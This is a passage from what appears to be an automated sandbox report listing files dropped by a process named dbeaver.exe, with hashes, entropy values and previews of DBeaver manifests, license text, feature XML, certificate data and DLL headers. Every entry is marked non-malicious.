      Encrypted:false
      SSDEEP:
      MD5:0471BAD8C2461319FB9FF7C84562745F
      SHA1:B645A2F958F827468EB1F76147295CA484431CB8
      SHA-256:920BD9E27E185CF66602A53A0147873039D50E50DF32794C605ACB0FA30FFCD7
      SHA-512:FA8554669C709D77B960836B88300A7C114B9985EE62E4F780C7E4C041499DBEF2C99D5A3D3C51FD23301754674E63A39BDB9E5D085A794B508C3E56035A50A9
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: rPxs755pvl8r73cEQCwZ8m3PTp20aQqrtohERybu0Ik=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: DjLuDSfGktZvqtaCYxKcKn9T58dLcjr3ZFGDyRKos44=....Name: feature.properties..SHA-256-Digest: aKYhEgTh/PKpjTH4mjpqr8Gar4HBMmq6twxwE+ehGcM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.654757971191424
      Encrypted:false
      SSDEEP:
      MD5:F0593398BA3C58B85CDE10713C58D248
      SHA1:A213AB297D5E0ADDE50569259672B49E64FE94C0
      SHA-256:ACFC6CEF9E69BE5F2BEF7704402C19F26DCF4E9DB4690AABB688444726EED089
      SHA-512:F697208300360EFAA8D3627B8D0D14E8D457FC9DCC96638C9CCDF7F15D9FF0486B60A819FC49DB0B9A7F6BAB64D5E58D312326E0F8B0632710CBFC1338136CB6
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: fHzdLHh8kXY1Xf8vhN1eGJpmcfTLqxG46PVN/zWoZfM=....Name: feature.properties..SHA-256-Digest: uaCM2xMySzNLmBm5SFjGVlOOLkxdFzVmfR7Pqx9EkqE=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12171
      Entropy (8bit):4.507716991364449
      Encrypted:false
      SSDEEP:
      MD5:E2F354E39552F102CDFF06E3F10EC51C
      SHA1:164BC140B90D400A95137CB862A633DBFD618EDD
      SHA-256:B9A08CDB13324B334B9819B94858C656538E2E4C5D1735667D1ECFAB1F4492A1
      SHA-512:D6AFE93292E1BE1D4107E81C667951556DAD7F594BCC0111CBF788D35F833AF9AFF4134E92CFFBEEABFB32A9DC87CCF531CB5FA328DB5ED2E7B6100802FCA761
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Runtime.providerName=DBeaver Corp.description=Universal Database Manager Runtime..copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.license=\. Apache License\n\. Version 2.0, January 2004\n\. http://www.apache.org/licenses/\n\.\n\. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\.\n\. 1. Definitions.\n\.\n\. "License" shall mean the terms and conditions for use, reproduction,\n\. and distribution as defined by Sections 1 through 9 of this document.\n\.\n\. "Licensor" shall mean the copyright owner or entity authorized by\n\. the copyright owner that is granting the License.\n\.\n\. "Legal Entity" shall mean the union of the acting entity and all\n\. other entities that control, are controlled by, or are under common\n\. control with that entity. For the purposes of this definition,\n\.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):2987
      Entropy (8bit):4.915558900223246
      Encrypted:false
      SSDEEP:
      MD5:4E1E68E9389435578EC6A3E93F46D062
      SHA1:8C94A22DD1EDDC3C64E57C9BB2BE384D010BED22
      SHA-256:7C7CDD2C787C9176355DFF2F84DD5E189A6671F4CBAB11B8E8F54DFF35A865F3
      SHA-512:57F8966262E036CEE65A77CD01E4005795B43EEDB3C7C1DE9BCD02E8DB3648E36BFB9C5D27139CB7309B66836A8D181532BB78D3A29307FBDB9A37728D021601
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.runtime.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName". plugin="org.jkiss.dbeaver.model">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import plugin="org.eclipse.core.runtime"/>. <import plugin="org.eclipse.core.resources"/>. <import plugin="org.eclipse.core.expressions"/>. </requires>.. 3rd party -->. <plugin id="slf4j.api" version="2.0.9" />. <plugin id="com.github.jsqlparser" version="4.5.0" />. <plugin id="org.apache.commons.jexl" version="3.1.0" />. <plugin id="com.google.gson" version="2.10.1.v20230109-0753"/>. <plugin id="com.jcraft.jsch" version="0.2.8" />. <plugin id="org.apache.commons.logging" version="1.2.0.v20180409-1502" />..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11932
      Entropy (8bit):7.677275512967374
      Encrypted:false
      SSDEEP:
      MD5:56C12F6E407605A44D109F62CEB88A37
      SHA1:8E8885FC750B5BD96C6770D132767546AD53C925
      SHA-256:F625872F211B86BC57B3DA11BC456AC3B757BED99BF25B307339D2C7D1900E67
      SHA-512:0B046622B42A2619BB64AE62B14B1EB817EDF7D1B302F133D7B4FF8EA74EFE88403A2631C32B6046AC1D9D7D26DC576FFCAEBFC689E62C60252066ABCB15E2F5
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.782844681765114
      Encrypted:false
      SSDEEP:
      MD5:9973A1686BC0EE7C9D3045BAB5B642C6
      SHA1:B44660D45F5919E6A8344DAE6CB55F46109B2744
      SHA-256:80AA7F6DEEC5481AE616F0554A07B21715B62637B645FDF68C4BA35BE5E11BE5
      SHA-512:1FE381C020922A997B9D3131E8BD02E9ACF0AFFD8A3E7D8273A2A45D9CBAE15DE87E4B9B740EC12D6448BFDFA47E376344D242A073E67B40C994A01F5EA3E36C
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: jB1AQecGlks/AQVsIWl3wDt23YwZ3Py3gqBO2niPWvY=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: W6ZV0chxGeBmasjqoNwVMsc26CppzFMIZu9N1GruGJs=....Name: feature.properties..SHA-256-Digest: ioBqyigRME7DXt5q9bMp74Bh10ca9Cp1nvvJTN2htBw=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.580740283073518
      Encrypted:false
      SSDEEP:
      MD5:5C5356FB35EDCE5397910F4A20F8A7AD
      SHA1:4FC821C28763B8BD19A84793586731B59837E6E3
      SHA-256:8C1D4041E706964B3F01056C216977C03B76DD8C19DCFCB782A04EDA788F5AF6
      SHA-512:E89BD3B67D9636BC68ADBE488AC84ACABD051D52B71A3EAEC20063DF12AB55284C2411CF1308B4267A7323DD498F7617D5F509C3D7C1F9B42A66BF5B37B6E693
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: qDKWMp51MDo8LmSWQmGch3NzHvojMvaHc/sDA/hKf0I=....Name: feature.properties..SHA-256-Digest: oWNr6BToz7CEctmEr5NjpmZc5pPqdtUg1ZpiyVEB6ss=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12197
      Entropy (8bit):4.507810279015883
      Encrypted:false
      SSDEEP:
      MD5:77429E3BB4697D69C7E33C880AA135E2
      SHA1:4213607348B4D7F9061BEE868D99EA88CE8DC64F
      SHA-256:A1636BE814E8CFB08472D984AF9363A6665CE693EA76D520D59A62C95101EACB
      SHA-512:74ECD12BD8CD11D1A122F17E704C3F96D8E87D479AD9DA9D4944B60B01E9C42DEF48D02020775C73F01ADE840CE5DF3C65873095DD76C6F8FDDA9717676E8A57
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Standalone.providerName=DBeaver Corp.description=DBeaver Universal Database Manager standalone application..copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.license=\. Apache License\n\. Version 2.0, January 2004\n\. http://www.apache.org/licenses/\n\.\n\. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\.\n\. 1. Definitions.\n\.\n\. "License" shall mean the terms and conditions for use, reproduction,\n\. and distribution as defined by Sections 1 through 9 of this document.\n\.\n\. "Licensor" shall mean the copyright owner or entity authorized by\n\. the copyright owner that is granting the License.\n\.\n\. "Legal Entity" shall mean the union of the acting entity and all\n\. other entities that control, are controlled by, or are under common\n\. control with that entity. For the purpos
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1595
      Entropy (8bit):4.949500748176289
      Encrypted:false
      SSDEEP:
      MD5:220C19DA6462EDE80292B970ACAD7BE9
      SHA1:574A6401BB82311B449CB6083A15C799B55B9567
      SHA-256:A83296329E75303A3C2E649642619C8773731EFA2332F68773FB0303F84A7F42
      SHA-512:2237396F467D4B96EDDABD4EA98EE35811A27B7472E03558493A566E71289C3B58016D290015ACBF93F929C021CB94831108EB1314F6030B35B55A36073A1D8F
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.standalone.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName". plugin="org.jkiss.dbeaver.ui.app.standalone">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <url>. <update label="DBeaver Universal Database Manager" url="https://dbeaver.io/"/>. </url>.. <includes id="org.jkiss.dbeaver.app.base.feature" version="24.0.0.202403031740"/>.. Additional plugins for standalone version -->. <plugin id="org.jkiss.dbeaver.ext.sample.database" version="1.0.163.202403031740" />.. P2 for RCP -->. Do not include p2.rcp as we don't need auto-update and scheduler -->. <includes id="org.eclipse.equinox.p2.core.feature" version="1.7.0.v20231112-1314"/>. <plugin id="org.eclipse.equino
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11930
      Entropy (8bit):7.676811483820673
      Encrypted:false
      SSDEEP:
      MD5:689CA4D7B743C7681FFE41C0DB03243F
      SHA1:094D13B3E5C521DDAFE39D1A9524ED87B1C9E926
      SHA-256:82B63A21A1E81BB8B3B2A8383B66D6C01D752F51D44FCCF93FE18EC11859E66D
      SHA-512:F248F4CD11D4993BC73296AD10E3194F065E5C6CAD33353F5AAD8E68A29EC98F8954B13C0DAB862F9D4452CFB12D16791762F99D14EE2F7B3126AAB4FFE73F05
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.8021804066161575
      Encrypted:false
      SSDEEP:
      MD5:E19F9337BCEAE660E2F1911C00104282
      SHA1:456D9B61C15C4AFBA364CAE154E2C75214DD9E29
      SHA-256:CEBD68DE93C459C5BD569447E4D879F3D7E4867A71B367B0C68442C81C805116
      SHA-512:F02373D5EBE1BA1011D598ED3D21B5483F1D143555B89F5379984C1D390BD65CF15F7E57A0D6E43731B5FC62AE86566B0C02FFDB955400E33B134C1B292F2D6D
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: Cc1ka85iZMvB6XIepeq7za7NUPxTVFrEYV1y4EUEVkY=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: 9u7Ote8S100jlUrfJ4RFDmfPPHhPUe9FeYKUfX/JkvA=....Name: feature.properties..SHA-256-Digest: 65Eq5N3kE51vm5Ph4aPGJXQ9yp48UX3dw5E2VCS2Inw=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.599448246773869
      Encrypted:false
      SSDEEP:
      MD5:DE385EB8F5E569D26F96A157813EC83C
      SHA1:A34A639DEF3D3DBCEC1B4C8B0F5156E655A4E75B
      SHA-256:09CD646BCE6264CBC1E9721EA5EABBCDAECD50FC53545AC4615D72E045045646
      SHA-512:F55BE3B358076B6B98DD5985A432CD4A31103791ADBFCAA85D823B5605BBCED151ABAFCB14DD6BB2A6FDED2899353EF3CEA16BBB9CB5589821094073F005DE0F
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: epZ8vazS123ZCf5UVcC/d5jyTQ/m4VvnyADH9DsTh9Y=....Name: feature.properties..SHA-256-Digest: VkbK/owfAkzVyXA9eb3prQCtT+LJ8Yf1HmJBHOavj0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):195
      Entropy (8bit):4.956378631582808
      Encrypted:false
      SSDEEP:
      MD5:EA95C0051F0FCE6E0A160C61C27BBEF9
      SHA1:F301462ED486768470F73752563D270D1B81799B
      SHA-256:5646CAFE8C1F024CD5C9703D79BDE9AD00AD4FE2C9F187F51E62411CE6AF8F4B
      SHA-512:5B5326E291F190878093B5854BFC5185E8D31A16B06441FB1DBBC5F5EE8113C399E69B3ACF5F2726AB3C896AD28109C8581481179ECF90F98AB6DA8B8429D351
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Desktop UI Extras.providerName=DBeaver Corp.description=DBeaver Desktop UI.copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1056
      Entropy (8bit):4.9689639175826885
      Encrypted:false
      SSDEEP:
      MD5:B122B6E1D18DF4929A82655225410041
      SHA1:F9EC5BFA0A391122ED141D8B1C17D96A606E816B
      SHA-256:7A967CBDACD2D76DD909FE5455C0BF7798F24D0FE6E15BE7C800C7F43B1387D6
      SHA-512:8F04FE0BB4C20CD560284803BB237C0ABD9C045DF048EAE24979C1F752C2CB6DD1305D099B8538F7E4E60E60CA7F784761BC3DC81BB75F021CA66FC91A5E4082
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.ui.extra.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <plugin id="org.jkiss.dbeaver.ext.ui.locks" version="1.0.171.202403031740" />. <plugin id="org.jkiss.dbeaver.tasks.ui" version="1.0.104.202403031740" />. <plugin id="org.jkiss.dbeaver.tasks.ui.view" version="1.0.75.202403031740" />. <plugin id="org.jkiss.dbeaver.tasks.native.ui" version="1.0.104.202403031740" />. <plugin id="org.jkiss.dbeaver.tasks.sql.ui" version="1.0.92.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.import_config" version="2.1.189.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.format.sqlworkbenchj" version="1.0.133.202403031740" />. <plugin id="org.jkiss.dbeaver.cmp.simple.ui" version="6.0.122.202403031740" />. <plugin id="org.jkiss.dbeaver.ui.d
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11930
      Entropy (8bit):7.678029597379031
      Encrypted:false
      SSDEEP:
      MD5:4389D1F61816DBE8E1AC4575872A1FA4
      SHA1:7F77B66F57E92A5BBE897A7F3C036041DB8D0D53
      SHA-256:F4DA526D385B68044B4B185EFD09733E57ABBEFBDD8F01773AD4152479EBD8BE
      SHA-512:10A7F254922621CFD91D7929537C20DF1E1E1A568BB5438E8B2EFD4A1A3F227F89F75F633C913AE201312E8E5FD64E5AA0251675168BAB0BB54EA6E86D1A5D2B
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.8089887190945095
      Encrypted:false
      SSDEEP:
      MD5:7559DB6BBC3A58040A3409B0EAC393FB
      SHA1:BE4B314C9671D8DA49829F518D2A745B26062295
      SHA-256:5E883138AD55943A982E12074423BF24BC4F75E43D445FB1AC69F94C7D2F1267
      SHA-512:4701610A0710F988AF8F4D065B81F7A0EA693719E01E94B49C7E27AB37B5715208D39A9CB06D5BD9637CD85BFAA58A0058925C3171A48A0C84D5A8882785E71C
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: x1sJb3x+juM9RFjbG/AqX5pv3Su/e+w1zpiCrLt2d4M=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: 5Q4OpVAvSbLxD+KnzZOW0F20Ks4G35745+Vh567EUQc=....Name: feature.properties..SHA-256-Digest: nnsXROoiWxJMKhf9sLq5s2h1axcmVFbQhOH7+azRa6w=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.6122063567937355
      Encrypted:false
      SSDEEP:
      MD5:D47F162BBE7EBC5D8732BD30AA1C916F
      SHA1:3F61C911A7EBB8A44A971F2CF43A6FE480E3327A
      SHA-256:C75B096F7C7E8EE33D4458DB1BF02A5F9A6FDD2BBF7BEC35CE9882ACBB767783
      SHA-512:C6FFE9C674F1884DD3F61C50594CA0BAF49B4BAA24200B3F0D34351AB79E9E96910BD020F5AD55B828F50BF3BF2E095400A0C4A95E17A386ACE5423BEDD4E048
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: WfS749WgKzrt7hhKaGoPwdzLSaBAq0XVw9D3Y5CF6Bo=....Name: feature.properties..SHA-256-Digest: w88F1umjkkznranWj5HoZnbdWhJoAnU+hT+pMr+okeo=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):188
      Entropy (8bit):4.940547730708922
      Encrypted:false
      SSDEEP:
      MD5:74F7B28A1B38C4C20C8B9A655CB517CA
      SHA1:EFBFD528BDE2A427DB668D1D195D3338AEE174AF
      SHA-256:C3CF05D6E9A3924CE7ADA9D68F91E86676DD5A126802753E853FA932BFA891EA
      SHA-512:D939F1CC79053E1BFE9B2AC85738332917A643DE43C39F6400D5279878326AE1C9FD113394357A7B7E706E5F4BF05F5A16AA99E0B1FEA6939123DBF6B5CF060E
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Desktop UI.providerName=DBeaver Corp.description=DBeaver Desktop UI.copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):3149
      Entropy (8bit):4.901959162258846
      Encrypted:false
      SSDEEP:
      MD5:39102D565B8C3E7DD237F26F4FF8FC17
      SHA1:49EDD09113043875FC0C882200E5B08182373B1D
      SHA-256:59F4BBE3D5A02B3AEDEE184A686A0FC1DCCB49A040AB45D5C3D0F7639085E81A
      SHA-512:8AC27B95456D75F655C677CC6CCC151D92C3F32D652B0F0D75F47E280102D72715345CD69D913E919EBA2AA36707CE6741B4D18C312E3C4C0ADD8806DBB1673B
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.ui.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <includes id="org.jkiss.dbeaver.runtime.feature" version="24.0.0.202403031740"/>.. <requires>. <import plugin="org.eclipse.gef" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.draw2d" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.core.expressions" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.ui" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.ui.workbench" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.ui.workbench.texteditor" version="0.0.0" match="greaterOrEqual"/>. <import plugin="org.eclipse.swt" version="0.0.0" match="greaterOrEqual"/>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):220672
      Entropy (8bit):6.128046202845155
      Encrypted:false
      SSDEEP:
      MD5:BFB145A295CBB9848950217D327858A8
      SHA1:5661A0A69BB594D25D38CE7E24A676ED84EBC7EA
      SHA-256:6308B91287C9624FBEDA97E72F4C7723F58FD473834F0485A2088691395AE8FD
      SHA-512:6FE784E860CBB9CBE2446E8F1FAD2B30070B86D4EFCD39B0991FC96FD5433F0FB449ACD4142BFF7EB0E6B8C909EFA5AC4B99E9F7A3BB12FA2BF666926C974846
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^|..^|..^|......^|......^|......^|......^|......^|..^}.-^|......^|......^|......^|.Rich.^|.................PE..d......O.........." .....d...........................................................................................................!..........x...............0'...................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....@...0......................@....pdata..0'.......(...,..............@..@.rsrc................T..............@..@.reloc..4............V..............@..B................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):56320
      Entropy (8bit):6.206341485631451
      Encrypted:false
      SSDEEP:
      MD5:778F292356DB445BFB7D9C571E97455A
      SHA1:CC0919F9022C005CCADDF2C1B55116873E151FED
      SHA-256:98857756F053F65670D856B2EFD11CC1EEC236593175C15A24F065D80DE2400B
      SHA-512:F26C024E0398388EF214BE9B1B931BE6E805418A8B06F9D27217A1DA27735590667E15F8DBF7DC1F03686358892F2D9F11B3C575A32FAC27CCAA2BACDC0BB14A
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+%..Ev..Ev..Ev.$8v..Ev.$(v..Ev..>v..Ev..Dv..Ev.$+v..Ev.$?v..Ev.$=v..EvRich..Ev........PE..d...A.^M.........." .....n...H.......................................................b..........................................................<........................"...........................................................................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data....!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..>...........................@..B........................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):6.975148254582308
      Encrypted:false
      SSDEEP:
      MD5:E5912B05988259DAD0D6D04C8A17D19B
      SHA1:724F4F91041AD595E365B724A0348C83ACF12BBB
      SHA-256:9F3608C15C5DE2F577A2220CE124B530825717D778F1E3941E536A3AB691F733
      SHA-512:C270A622D7887F4C97232EA898F5380459C565817F0D201CDB081EE82E3002B6E6248753A68DA896D3B1327F93E8E8CB0CA0DCAEEF324F610E0A1C7B542C6492
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................." .........................................................0......ND....`.........................................`...,............ ...................=..............T............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):6.984171794145316
      Encrypted:false
      SSDEEP:
      MD5:16789CC09A417D7DEB590FFFE4ED02DC
      SHA1:4940D5B92B6B80A40371F8DF073BF3EB406F5658
      SHA-256:3B68D7AB0641DE6B3E81D209B7C0D3896E4FFA76617BBADD01EB54036CDD1B07
      SHA-512:19E4F086CC2137EE60316B0736B3C6B3780578896DF9A826EDFE004BB74BEE8E051C511A84D8A7EA278A5F47C82B9C955394F629AB0BB0740ECB51293D9BE7B7
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....F.L.........." .........................................................0......B.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):6.988934641003721
      Encrypted:false
      SSDEEP:
      MD5:9476AFFAAC53E6E34405C4001F141805
      SHA1:E7C8A6C29C3158F8B332EEA5C33C3B1E044B5F73
      SHA-256:55574F9E80D313048C245ACEFD21801D0D6C908A8A5049B4C46253EFAF420F89
